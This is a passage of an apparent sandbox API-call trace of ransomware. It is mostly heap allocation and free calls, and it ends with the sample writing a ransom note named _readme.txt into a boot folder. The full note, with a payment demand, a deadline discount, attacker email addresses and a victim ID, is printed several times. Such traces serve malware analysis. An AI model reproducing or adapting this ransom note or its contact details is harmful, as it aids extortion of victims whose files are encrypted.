Flags=0x0, Size=0x20) returned 0x332fca8 [0094.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.203] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.204] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.206] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.207] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0094.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.207] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0094.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.207] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.207] PathFindFileNameW (pszPath="") returned="" [0094.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.207] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0094.208] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0094.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0094.208] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0094.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b79750 [0094.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.208] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.208] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.209] FreeLibrary (hLibModule=0x75670000) returned 1 [0094.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0094.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.209] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.209] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x9b79750 [0094.209] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0094.209] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.209] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 0 [0094.209] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0094.209] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0094.210] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0094.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0094.210] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\_readme.txt" (normalized: "c:\\boot\\zh-tw\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0094.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0094.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0094.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0094.211] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0094.211] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.211] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0094.211] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0094.211] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0094.212] CloseHandle (hObject=0x5c8) returned 1 [0094.212] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 